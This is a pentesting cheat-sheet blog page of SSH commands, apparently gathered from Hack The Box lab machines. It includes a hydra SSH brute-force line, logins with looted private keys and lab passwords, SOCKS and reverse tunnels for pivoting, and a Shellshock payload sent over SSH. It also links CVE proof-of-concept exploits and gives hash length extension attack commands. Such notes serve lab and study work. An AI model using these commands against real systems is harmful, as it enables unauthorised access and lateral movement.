Skip to main content

SSH Commands

hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt

kali linux > ssh -i privatekey thrasivoulos@fe80::0250:56ff:feaa:4146%tun0

puttygen 10.10.10.107-alice_my_private_key.ppk -O private-openssh -o alice.pem

ssh -D 1080 -L 6801:127.0.0.1:5801 -L 6901:127.0.0.1:5901 charix@10.10.10.84
ssh -D 1080 -L 6801:127.0.0.1:5801 -L 6901:127.0.0.1:5901 yuhi@10.10.10.77
ssh -D <local host>:1010 -p 22 user@<remote host>
ssh -D <local proxy port> -p <remote port> <target>
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com ssh -f -N -R 2222:<local host>:22 root@<remote host>
ssh -i alice.pem alice1978@10.10.10.107
ssh -i alice.pem alice1978@10.10.10.107 \\ bob8791
ssh -i dead0b5b829ea2e3d22f47a7cbde17a6-23269 drno@10.10.10.124 bash
ssh -i frank-key frank@10.10.10.34
ssh -i id_hype hype@10.10.10.79
ssh -i id_rsa orestis@brainfunk.htb
ssh -i id_rsa orestis@brainfunk.htb [ 3poulakia! ]
ssh -i id_rsa root@10.10.10.34
ssh -i id_rsa takis@10.10.10.10 [ yes | password : superpassword ]
ssh -i mitsos.key mitsos@10.10.10.18
ssh -i .monitor monitor@127.0.0.1
ssh -i monitor.ssh nobody@10.10.10.87
ssh -i noob noob@$ip '() { :;}; /bin/bash'
ssh -i privatekey thrasivoulos@dead:beef:0000:0000:0250:56ff:fe8f:d8 53
ssh -i privatekey thrasivoulos@dead:beef:0000:0000:0250:56ff:fea4:dd f3
ssh -i private.key thrasivoulos@dead:beef::250:56ff:fe8f:a397
ssh -i roosa.key roosa@10.10.10.91
ssh -i root root@localhost
ssh -i /tmp/id_rsa root@localhost
ssh -i unknown1.key root@10.10.10.91
ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84
ssh -L 5901:127.0.0.1:5901 yuhi@10.10.10.77
ssh -L 5902:localhost:5901 charix@10.10.10.84
ssh -L 8022:127.0.0.1:22 -i monitor.ssh nobody@10.10.10.87
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@ip -p22022
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
ssh -o StrictHostKeyChecking=no -i nineveh.priv amrois@10.10.10.43
ssh -p 8022 -i monitor.ssh monitor@localhost
ssh -p 8022 -i monitor.ssh monitor@localhost bash
ssh -p 8022 -i monitor.ssh monitor@localhost 'echo $PATH'
ssh -p 8022 -i monitor.ssh monitor@localhost 'echo $PS1'
ssh -t -p 8022 -i monitor.ssh monitor@localhost bash
ssh -vvv

Comments

Popular posts from this blog

POC Links for CVE's

  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main

Hash Extension Attacks

  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512